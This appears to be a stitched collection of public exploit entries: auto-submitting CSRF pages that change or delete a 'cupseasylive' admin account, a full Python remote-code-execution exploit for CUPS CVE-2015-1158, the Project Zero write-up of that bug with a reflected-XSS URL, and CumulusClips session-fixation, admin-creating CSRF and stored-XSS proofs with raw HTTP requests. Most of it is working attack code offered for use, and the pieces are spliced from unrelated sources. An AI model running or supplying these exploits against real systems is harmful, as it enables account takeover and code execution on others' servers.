     passwordmychange.php sets the password of the named account.
     NOTE(review): the target username travels in the request body; whether the
     server trusts it over the session user is not visible here -- confirm. -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEADDRESS/cupseasylive/passwordmychange.php" method="POST">
<input type="hidden" name="username" value="admin" />
<!-- Replace with the password to set. -->
<input type="hidden" name="password" value="PASSWORDHERE" />
<input type="hidden" name="change" value="Change" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Proof of concept for user delete:
<html>
<!-- Auto-submitting CSRF page for userdelete.php: deletes the account named
     in "username" (here admin) when a logged-in administrator loads it.
     No anti-CSRF token is part of the request. -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEADDRESS/cupseasylive/userdelete.php" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="delete" value="Delete" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
#!/usr/bin/python
# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution
# Google Dork: n/a
# Date: 2/2/17
# Exploit Author: @0x00string
# Vendor Homepage: cups.org
# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2
# Version: <2.0.3
# Tested on: Ubuntu 14/15
# CVE : CVE-2015-1158
import os, re, socket, random, time, getopt, sys
from socket import *
from struct import *
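def banner():
    """Print the ASCII-art banner and the script's home URL.

    Written as print(...) with parentheses so the same text is emitted on
    Python 2 and Python 3; the rest of this script still uses Python 2
    print statements.
    """
    print('''
lol ty google
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py
''')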
def usage ():
    """Print the command-line help text, then terminate via exit()."""
    lines = [
        "python script.py <args>",
        " -h, --help: Show this message",
        " -a, --rhost: Target IP address",
        " -b, --rport: Target IPP service port",
        " -c, --lib /path/to/payload.so",
        " -f, --stomp-only Only stomp the ACL (no postex)",
        "",
        "Examples:",
        "python script.py -a 10.10.10.10 -b 631 -f",
        "python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so",
    ]
    # Every line ends in "\n" in the original text, hence the trailing one.
    print("\n".join(lines) + "\n")
    exit()
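def pretty (t, m):
    """Print *m* prefixed with a coloured status tag chosen by *t*.

    t: "+" (green), "-" (red), "*" (blue) or "!" (yellow); any other value
       prints nothing, as before.
    m: the message text.
    Uses == rather than `is` -- the original compared string identity, which
    only worked because CPython happens to intern one-character literals.
    """
    prefixes = {
        "+": "\x1b[32;1m[+]\x1b[0m\t",
        "-": "\x1b[31;1m[-]\x1b[0m\t",
        "*": "\x1b[34;1m[*]\x1b[0m\t",
        "!": "\x1b[33;1m[!]\x1b[0m\t",
    }
    prefix = prefixes.get(t)
    if prefix is None:
        return
    # Equivalent to the Python 2 `print ...,` form (string already ends in
    # "\n") and works on Python 3 as well.
    sys.stdout.write(prefix + m + "\n")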
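def createDump (input):
    """Return a hex dump of *input* (bytes, or str on Python 2).

    Each row holds 16 bytes: the hex column (two hex digits per byte,
    space-separated) padded to 56 characters, then the printable column with
    one glyph per byte, also space-separated, and a newline.  NUL is shown as
    '0' (what the original's never-true `e == '0x0'` test intended), bytes
    0x20-0x7e as themselves, anything else as '.'.  Empty input yields "".

    Works on Python 2 and 3: bytearray() turns either str or bytes into ints,
    replacing the Python 2-only str.encode("hex").
    """
    data = bytearray(input)
    hexes = ["%02x" % byte for byte in data]
    glyphs = []
    for byte in data:
        if byte == 0:
            glyphs.append("0")
        elif 0x20 <= byte <= 0x7e:
            glyphs.append(chr(byte))
        else:
            glyphs.append(".")
    rows = []
    for start in range(0, len(data), 16):
        hex_col = " ".join(hexes[start:start + 16])
        ascii_col = " ".join(glyphs[start:start + 16])
        # Pad every row to the same width (the original only padded the last one).
        rows.append(hex_col.ljust(56) + ascii_col + "\n")
    return "".join(rows)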
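class tcpsock:
    """Minimal blocking TCP client used by txrx(): connect, send one request,
    then read until the peer closes the connection."""

    def __init__(self, sock=None):
        # `socket` here is the class pulled in by `from socket import *`.
        if sock is None:
            self.sock = socket(AF_INET, SOCK_STREAM)
            # A server that never closes would otherwise block rx() forever.
            self.sock.settimeout(30)
        else:
            self.sock = sock

    def connect(self, host, port):
        self.sock.connect((host, int(port)))

    def tx(self, msg):
        # sendall() retries until every byte is written; send() may return
        # after a partial write and silently truncate the IPP request.
        self.sock.sendall(msg)

    def rx(self):
        # Collect chunks and join once; b"" is a plain str on Python 2, so
        # this also fixes the str + bytes TypeError on Python 3.
        chunks = []
        tmp = self.sock.recv(1024)
        while tmp:
            chunks.append(tmp)
            tmp = self.sock.recv(1024)
        return b"".join(chunks)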
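def txrx (ip, port, proto, txpacket):
    """Open a *proto* ("tcp" or "udp") connection to ip:port, send *txpacket*
    and return everything the peer sends back before closing.

    Returns None for any other *proto* value.  Compares with == instead of the
    original `is`, which only matched string literals by interning accident.
    """
    if proto == "tcp":
        sock = tcpsock()
    elif proto == "udp":
        # NOTE(review): udpsock is not defined anywhere in this listing; the
        # udp path raises NameError unless it is supplied elsewhere.
        sock = udpsock()
    else:
        return None
    sock.connect(ip, port)
    sock.tx(txpacket)
    return sock.rx()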
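def locatePrinters(rhost, rport="631"):
    """Fetch /printers from the CUPS web UI and return the path of the first
    printer listed (e.g. "/printers/foo").

    rport may be an int or a str: it is normalised here because the Host
    header needs text while txrx() needs an int (passing an int previously
    raised TypeError on the string concatenation).  Exits the process when the
    request fails or no printer row matches.

    NOTE(review): this script is Python 2 (print statements elsewhere); on
    Python 3 the request would have to be bytes and the regex run on decoded
    text.  The regex also assumes the CUPS 2.0 /printers table layout.
    """
    rport = str(rport)
    request = ( "GET /printers HTTP/1.1\x0d\x0a"
    "Host: " + rhost + ":" + rport + "\x0d\x0a"
    "User-Agent: CUPS/2.0.2\x0d\x0a"
    "Connection: Close\x0d\x0a"
    "\x0d\x0a")
    response = txrx(rhost, int(rport), "tcp", request)
    if response is None:
        pretty("-", "no printers")
        exit(1)
    m = re.search(r'<TR><TD><A HREF="(.+)">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)
    if m is None:
        pretty("-", "no printers")
        exit(1)
    printer = m.group(1)
    pretty("+", "printer found: " + printer)
    return printer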
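def preparePayload(libpath):
    """Read the shared object at *libpath*, print a hex dump of it and return
    its bytes.

    read() never returns None, so the original `is not None` check could not
    fail; an empty file would have been sent to the target as a zero-byte
    library.  An empty file is now reported and usage() is called, which
    terminates the process (so the return only runs on success).
    """
    with open(libpath, 'rb') as f:
        payload = f.read()
    if not payload:
        pretty("-", "something went wrong")
        usage()
    pretty("*", "Payload:\n" + createDump(payload))
    return payload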
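def seedTarget(rhost, rport, printer, payload):
    """Spool `payload` on the target as a held print job and return its job id.

    Two IPP requests are POSTed to `printer`: Create-Job (op 0x0005), with
    job-hold-until=indefinite so the document stays in /var/spool/cups, then
    Send-Document (op 0x0006) carrying `payload` as application/octet-stream.
    The job id is scraped from the Create-Job reply
    ("ipp://<rhost>:<rport>/jobs/<id>"); poisonConfig() later points
    LD_PRELOAD at the spooled file.

    Args:
        rhost: target host.
        rport: target port (str or int; used through str()/int()).
        printer: printer path from locatePrinters(), e.g. "/printers/foo".
        payload: raw library bytes to spool.

    Returns:
        The job id as a digit string. Exits if Create-Job gets no reply or
        no job URI (the original then failed later with an unbound `jobid`).

    Note: the IPP encoding is Python 2 str-based like the rest of this file;
    struct.pack() already returns str there, so it is not re-wrapped in str().
    """
    i = random.randint(1, 3)
    reqid = pack(">i", (i + 2))
    reqid2 = pack(">i", (i + 3))
    printer_uri = "ipp://" + rhost + ":" + str(rport) + printer

    # Operation attributes shared by both requests: charset, language, URI.
    op_attrs = ("\x47" "\x00\x12" "attributes-charset" "\x00\x05" "utf-8"
                "\x48" "\x00\x1b" "attributes-natural-language" "\x00\x05" "en-us"
                "\x45" "\x00\x0b" "printer-uri"
                + pack(">h", len(printer_uri)) + printer_uri)

    def ipp_post(body):
        """Wrap an IPP body in the HTTP POST envelope the scheduler expects."""
        return ("POST " + printer + " HTTP/1.1\x0d\x0a"
                "Content-Type: application/ipp\x0d\x0a"
                "Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
                "User-Agent: CUPS/2.0.2\x0d\x0a"
                "Connection: Close\x0d\x0a"
                "Content-Length: " + str(len(body)) + "\x0d\x0a"
                "\x0d\x0a") + body

    create_job_packet = (
        "\x02\x00"                                          # IPP 2.0
        "\x00\x05"                                          # op: Create-Job
        + reqid +
        "\x01"                                              # operation-attributes
        + op_attrs +
        "\x42" "\x00\x14" "requesting-user-name" "\x00\x04" "root"
        "\x42" "\x00\x08" "job-name" "\x00\x06" "badlib"
        "\x02"                                              # job-attributes
        "\x21" "\x00\x06" "copies" "\x00\x04" "\x00\x00\x00\x01"
        "\x23" "\x00\x0a" "finishings" "\x00\x04" "\x00\x00\x00\x03"
        "\x42" "\x00\x10" "job-cancel-after" "\x00\x05" "\x31\x30\x38\x30\x30"  # "10800"
        "\x44" "\x00\x0e" "job-hold-until" "\x00\x0a" "indefinite"
        "\x21" "\x00\x0c" "job-priority" "\x00\x04" "\x00\x00\x00\x32"
        "\x42" "\x00\x0a" "job-sheets" "\x00\x04" "none"
        "\x42" "\x00\x00" "\x00\x04" "none"                 # second job-sheets value
        "\x21" "\x00\x09" "number-up" "\x00\x04" "\x00\x00\x00\x01"
        "\x03")                                             # end-of-attributes

    pretty("*", "Sending createJob")
    blah = txrx(rhost, int(rport), "tcp", ipp_post(create_job_packet))
    m = None
    if blah is not None:
        # Escape host:port so a '.' in an IP only matches a literal dot.
        m = re.search(re.escape("ipp://" + rhost + ":" + str(rport)) + r"/jobs/(\d+)", blah)
    if m is None:
        pretty("-", "something went wrong")
        exit()
    jobid = m.group(1)
    pretty("*", "\n" + createDump(blah) + "\n")

    pretty("*", "Sending sendJob")
    send_document_packet = (
        "\x02\x00"                                          # IPP 2.0
        "\x00\x06"                                          # op: Send-Document
        + reqid2 +
        "\x01"                                              # operation-attributes
        + op_attrs +
        "\x21" "\x00\x06" "job-id" "\x00\x04" + pack(">i", int(jobid)) +
        "\x42" "\x00\x14" "requesting-user-name" "\x00\x04" "root"
        "\x42" "\x00\x0d" "document-name" "\x00\x06" "badlib"
        "\x49" "\x00\x0f" "document-format" "\x00\x18" "application/octet-stream"
        "\x22" "\x00\x0d" "last-document" "\x00\x01" "\x01"
        "\x03"                                              # end-of-attributes
        + payload)
    blah2 = txrx(rhost, int(rport), "tcp", ipp_post(send_document_packet))
    # The original dumped the Create-Job reply a second time here, so the
    # Send-Document reply was never shown.
    pretty("*", "\n" + createDump(blah2) + "\n")
    pretty("*", "job id: " + jobid)
    return jobid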
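def _stompPacket(reqid, printer_url, target):
    """Build the Create-Job body that over-decrements the refcount of `target`.

    `target` ("/admin" or "/admin/conf") is sent as the request's
    attributes-natural-language (and as requesting-user-name), so it is the
    `language` string attached to the request's values; job-originating-host-name
    then carries twelve values (one named, eleven additional with an empty
    name), and add_job() frees that language string once per value
    (CVE-2015-1158, see the write-up further down). `reqid` is the already
    packed 4-byte request id. The bytes are identical to the two hand-written
    packets this helper replaces.
    """
    additional_value = ("\x42"          # nameWithoutLanguage
                        "\x00\x00"      # name len: 0 -> another value of the previous attribute
                        "\x00\x0c"      # val len: 12
                        "AAAAAAAAAAAA")
    target_len = pack(">h", len(target))
    return ("\x02\x00"                  # IPP 2.0
            "\x00\x05"                  # op id: Create-Job (0x0005)
            + reqid +
            "\x01"                      # operation attributes marker
            "\x47" "\x00\x12" "attributes-charset" "\x00\x08" "us-ascii"
            "\x48" "\x00\x1b" "attributes-natural-language" + target_len + target +
            "\x45" "\x00\x0b" "printer-uri" + pack(">h", len(printer_url)) + printer_url +
            "\x42" "\x00\x14" "requesting-user-name" + target_len + target +
            "\x02"                      # job attributes marker
            "\x21" "\x00\x06" "copies" "\x00\x04" "\x00\x00\x00\x01"
            "\x42" "\x00\x19" "job-originating-host-name" "\x00\x0c" "AAAAAAAAAAAA"
            + additional_value * 11 +
            "\x36"                      # nameWithLanguage
            "\x00\x00"                  # name len: 0
            + pack(">h", 2 + len(target) + 2 + 12) +   # val len: lang-len + lang + text-len + text
            target_len + target +
            "\x00\x0c" "BBBBBBBBBBBB"
            "\x03")                     # end of attributes


def stompACL(rhost, rport, printer):
    """Knock out the ACLs on /admin and /admin/conf, then verify /admin is open.

    Sends one _stompPacket() for "/admin" and, a second later, one for
    "/admin/conf" (request ids i+1 and i+2 for a random i), hex-dumping each
    request and reply. A plain GET /admin must then answer "200 OK";
    otherwise "exploit failed" is reported and the process exits with 1.

    Args:
        rhost: target host.
        rport: target port as a str (spliced into the Host header and handed
            to txrx() unchanged).
        printer: printer path from locatePrinters().
    """
    i = random.randint(1, 1024)
    printer_url = "ipp://" + rhost + ":" + rport + printer

    def http_post(body):
        """HTTP envelope for an IPP body, Content-Length taken from the body."""
        return ("POST " + printer + " HTTP/1.1\x0d\x0a"
                "Content-Type: application/ipp\x0d\x0a"
                "Host: " + rhost + ":" + rport + "\x0d\x0a"
                "User-Agent: CUPS/2.0.2\x0d\x0a"
                "Connection: Close\x0d\x0a"
                "Content-Length: " + str(len(body)) + "\x0d\x0a"
                "\x0d\x0a") + body

    pretty("*", "stomping ACL")
    for n, target in enumerate(("/admin", "/admin/conf")):
        if n:
            time.sleep(1)  # same pause between the two stomps as the original
        request = http_post(_stompPacket(pack(">i", (i + 1 + n)), printer_url, target))
        pretty("*", ">:\n" + createDump(request))
        pretty("*", "<:\n" + createDump(txrx(rhost, rport, "tcp", request)))

    http_header_check = ("GET /admin HTTP/1.1\x0d\x0a"
                         "Host: " + rhost + ":" + rport + "\x0d\x0a"
                         "User-Agent: CUPS/2.0.2\x0d\x0a"
                         "Connection: Close\x0d\x0a"
                         "\x0d\x0a")
    pretty("*", "checking /admin")
    pretty("*", ">:\n" + createDump(http_header_check))
    res = txrx(rhost, rport, "tcp", http_header_check)
    pretty("*", "<:\n" + createDump(res))
    if re.search('200 OK', res) is None:
        pretty("-", "exploit failed")
        exit(1)
    pretty("+", "ACL stomp successful")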
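def getConfig(rhost, rport):
    """Download /admin/conf/cupsd.conf over HTTP and return its body as a str.

    Only works after stompACL() has opened /admin/conf. The reply must be a
    200 and contain the header/body separator; anything else (e.g. a 403
    error page) is reported and the process exits with 1 instead of being
    returned, so putConfig() can never install an HTML error page as the
    target's cupsd.conf.

    Args:
        rhost: target host.
        rport: target port as a str.
    """
    http_request = ("GET /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
                    "Host: " + rhost + ":" + rport + "\x0d\x0a"
                    "User-Agent: CUPS/2.0.2\x0d\x0a"
                    "Connection: Close\x0d\x0a"
                    "\x0d\x0a")
    pretty("*", "grabbing configuration file....")
    res = txrx(rhost, rport, "tcp", http_request)
    # Split at the first blank line only: the original split on every
    # CRLF CRLF and kept the first piece, truncating a config that contains
    # such a run itself.
    head, sep, original_config = (res or "").partition("\x0d\x0a\x0d\x0a")
    if not sep or re.search('200 OK', head) is None:
        pretty("-", "could not read cupsd.conf")
        exit(1)
    pretty("*", "config:\n" + original_config + "\n")
    return original_config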
def putConfig(rhost, rport, config):
    """Upload `config` as the target's /admin/conf/cupsd.conf via HTTP PUT.

    Requires the /admin/conf ACL to have been stomped first. Both the request
    and the server's reply are hex-dumped to the console; nothing is returned
    and the reply is not checked.

    Args:
        rhost: target host.
        rport: target port as a str.
        config: the full cupsd.conf text to install.
    """
    header_lines = [
        "PUT /admin/conf/cupsd.conf HTTP/1.1",
        "Content-Type: application/ipp",
        "Host: " + rhost + ":" + rport,
        "User-Agent: CUPS/2.0.2",
        "Connection: Keep-Alive",
        "Content-Length: " + str(len(config)),
        "",
        "",
    ]
    # Joining with CRLF leaves the blank line that separates header and body.
    request = "\x0d\x0a".join(header_lines) + config
    pretty("*", "overwriting config...")
    pretty("*", ">:\n" + createDump(request))
    reply = txrx(rhost, rport, "tcp", request)
    pretty("*", "<:\n" + createDump(reply))
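def poisonConfig(config, name):
    """Append an LD_PRELOAD directive pointing at the spooled payload to cupsd.conf.

    The document of job `name` is spooled as /var/spool/cups/d<jobid>-001,
    where cupsd zero-pads the job id to five digits (d%05d-%03d). The original
    hard-coded the prefix "d000", which only yields the right name for
    two-digit job ids; formatting the id fixes ids below 10 and above 99 and
    produces byte-identical output for 10..99.

    Args:
        config: the current cupsd.conf text.
        name: the job id from seedTarget(), a digit string or an int.

    Returns:
        config followed by a blank line and the SetEnv line.
    """
    spool_file = "/var/spool/cups/d%05d-001" % int(name)
    return config + "\x0a\x0aSetEnv LD_PRELOAD " + spool_file + "\x0a"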
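def main():
    """Parse options and run the chain: locate printer -> stomp ACL -> [spool lib -> poison config].

    Options: -a/--rhost HOST and -b/--rport PORT (both required), -c/--lib PATH
    (required unless -f is given), -f/--stomp-only (stop after the ACL stomp),
    -h/--help. Unknown options and a missing --lib are caught up front and
    routed to usage() before the target is touched; the original raised
    getopt.GetoptError, or stomped the ACL and only then died with an
    unbound `libpath` NameError.
    """
    rhost = rport = libpath = None
    noshell = None
    try:
        options, remainder = getopt.getopt(
            sys.argv[1:], 'a:b:c:fh',
            ['rhost=', 'rport=', 'lib=', 'stomp-only', 'help'])
    except getopt.GetoptError:
        usage()
        return
    for opt, arg in options:
        if opt in ('-h', '--help'):
            usage()
            return
        elif opt in ('-a', '--rhost'):
            rhost = arg
        elif opt in ('-b', '--rport'):
            rport = arg
        elif opt in ('-c', '--lib'):
            libpath = arg
        elif opt in ('-f', '--stomp-only'):
            noshell = 1
    banner()
    if rhost is None or rport is None:
        usage()
        return
    if noshell is None and libpath is None:
        # Validate before the destructive part: a stomp without a library
        # to preload would leave the target's ACLs freed for nothing.
        pretty("-", "--lib is required unless --stomp-only is given")
        usage()
        return
    pretty("*", "locate available printer")
    printer = locatePrinters(rhost, rport)
    pretty("*", "stomp ACL")
    stompACL(rhost, rport, printer)
    if noshell is not None:
        pretty("*", "fin")
        exit(0)
    pretty("*", "prepare payload")
    payload = preparePayload(libpath)
    pretty("*", "spray payload")
    jobid = seedTarget(rhost, rport, printer, payload)
    pretty("*", "grab original config")
    OG_config = getConfig(rhost, rport)
    pretty("*", "generate poison config")
    evil_config = poisonConfig(OG_config, jobid)
    pretty("*", "upload poison config")
    putConfig(rhost, rport, evil_config)
    pretty("*", "fin")
    exit(0)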
# Script entry point; main() parses argv and ends the process with exit(0).
if __name__ == "__main__":
    main()
Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html
Abstract
Modern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers.
Despite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.
In this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation.
By publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.
Summary
Cupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle the ACLs protecting privileged operations, upload a replacement configuration file, then run arbitrary code.
The reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.
Exploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.
Background
Improper Teardown - Reference Count Over-Decrement (CVE-2015-1158)
When freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.
scheduler/ipp.c:1626:
/*
* Free old strings… ← Even 'old' strings need to be freed.
*/
for (i = 0; i < attr->num_values; i ++)
{
_cupsStrFree(attr->values[i].string.text);
attr->values[i].string.text = NULL;
if (attr->values[i].string.language) ← for all values in an attribute
{
_cupsStrFree(attr->values[i].string.language); ← free the 'language' string
attr->values[i].string.language = NULL;
}
}
In this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request.
To specifically target a string and free it, we send an 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.
The over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations.
Dangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.
A Reflected XSS in the Web Interface (CVE-2015-1159)
The template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'.
The template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting.
The code is found in 'cgi_puts()', and escapes the following reserved HTML characters:
<>"'&
These are replaced with their HTML entity equivalents ('&lt;' for '<', '&amp;' for '&', and so on).
The function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:
if (*s == '<')
{
/*
* Pass <A HREF="url"> and </A>, otherwise quote it...
*/
if (!_cups_strncasecmp(s, "<A HREF=\"", 9))
{
fputs("<A HREF=\"", out);
s += 9;
while (*s && *s != '\"')
{
if (*s == '&')
fputs("&amp;", out);
else
putc(*s, out);
s ++;
}
if (*s)
s ++;
fputs("\">", out);
}
For variable values containing '<a href="', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing " would normally be escaped, but are echoed unaltered in this context.
Note that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue.
Take this example from templates/help-header.tmp:19:
<P CLASS="l0"><A HREF="/help/{QUERY??QUERY={QUERY}:}">All Documents</A></P>
In this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href="', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags.
Requesting the following URI will demonstrate this reflected XSS:
http://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search
The 'QUERY' parameter is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield an HTML page that parses without errors.
Upstream Fixes
Apple Fix (April 16, 2015):
https://support.apple.com/kb/DL1807
Official CUPS fix for downstream vendors (June 8, 2015):
https://www.cups.org/str.php?L4609
http://www.cups.org/blog.php?L1082+I0+Q
Project Zero Bug
For those interested, the sample exploit can be found here:
https://code.google.com/p/google-security-research/issues/detail?id=455
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37336.tar.gz
Disclosure Timeline
March 20th, 2015 - Initial notification to Apple
April 16th, 2015 - Apple ships fix in Mac OS X 10.10.3
June 8th, 2015 - CUPS ships official fix in CUPS 2.0.3
June 18th, 2015 - Disclosure + 90 days
June 19th, 2015 - P0 publication
Attack Surface Reduction in CUPS 2.0.3+
CUPS 2.0.3 and the 2.1 beta contain several prescient implementation changes to limit the risk and impact of future similar bugs:
Configuration value strings are now logically separated from the string pool, allocated by strdup() instead.
LD_* and DYLD_* environment variables are blocked when CUPS is running as root.
The localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).
Acknowledgements
Thanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.
Conclusion
No one prints anything anymore anyways.
# Exploit Title: CumulusClips Session fixation
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
Description:
CumulusClips is a video sharing script that allows you to start your own
video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS &
Android mobile devices, as well as all the major browsers.
PoC:
POST /cumulusclips/account/videos/edit/1362/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1362/
Cookie: PHPSESSID=bqaok1gfcs0s7hqfc40g2bsbr1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 211
title=evilcartoon%3Cscript%3Edocument.cookie%3D%27PHPSESSID%
3Dxxxxxxxxxxxxxxxxxxxxxxxxxx%3Bpath%3D%2F%3B%27%3C%
2Fscript%3E&tags=aaa&cat_id=1&description=aaa&private_url=
BOZtzZX&submitted=TRUE&button=Update+Video
Remediation:
Regenerate the session ID on successful login (e.g. PHP's session_regenerate_id(true)) so that an attacker-planted PHPSESSID cookie is never promoted to an authenticated session.
Post exploitation:
Since it is possible to impersonate the admin, the admin panel's unrestricted file upload can then be used to achieve code execution.
#######################################################
# Exploit Title: CumulusClips XSRF and code execution
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
# CVE : [if applicable]
Description:
CumulusClips is a video sharing script that allows you to start your own video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.
PoC:
<!--
  CSRF PoC: auto-submits a cross-origin POST to the admin "add member" form.
  It only has an effect while the victim's browser holds a logged-in
  CumulusClips admin session for 192.168.122.203 and the form carries no
  anti-CSRF token; the hidden fields mirror members_add.php and create a
  new user with the "admin" role.
-->
<html>
<body>
<form action="http://192.168.122.203/cumulusclips/cc-admin/members_add.php" method="POST">
  <input type="hidden" name="role" value="admin" />
  <input type="hidden" name="email" value="admin@mailinator.com" />
  <input type="hidden" name="username" value="newadmin" />
  <input type="hidden" name="password" value="newadminpass" />
  <input type="hidden" name="password-show" value="" />
  <input type="hidden" name="first_name" value="" />
  <input type="hidden" name="last_name" value="" />
  <input type="hidden" name="website" value="" />
  <input type="hidden" name="about_me" value="" />
  <input type="hidden" name="submitted" value="TRUE" />
  <input type="submit" value="Submit request" />
</form>
<script>
  <!-- no user interaction needed: the form is submitted as soon as the page loads -->
  document.forms[0].submit();
</script>
</body>
</html>
Remediation:
Use a per-session anti-CSRF token on every state-changing admin form (members_add.php included) and fix the XSS issues as well, since a stored XSS on the same origin can read such a token and defeat it.
#######################################################
# Exploit Title: CumulusClips Persistent XSS
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
# CVE : [if applicable]
Description:
CumulusClips is a video sharing script that allows you to start your own video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.
Any registered user can inject script into the main site through video metadata (title, tags, description). The session cookie is set without the HttpOnly flag, so the injected script can read document.cookie and exfiltrate the session ID.
PoC:
locations:
/cumulusclips/account/videos/edit/
/cumulusclips/account/upload/video/
POST /cumulusclips/account/videos/edit/1358/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1358/
Cookie: PHPSESSID=etia0ncfb00m0ma1834cf1dds5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
title=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat_id=1&description=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&private_url=DyZbn8m&submitted=TRUE&button=Update+Video
reflected on main site:
GET /cumulusclips/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
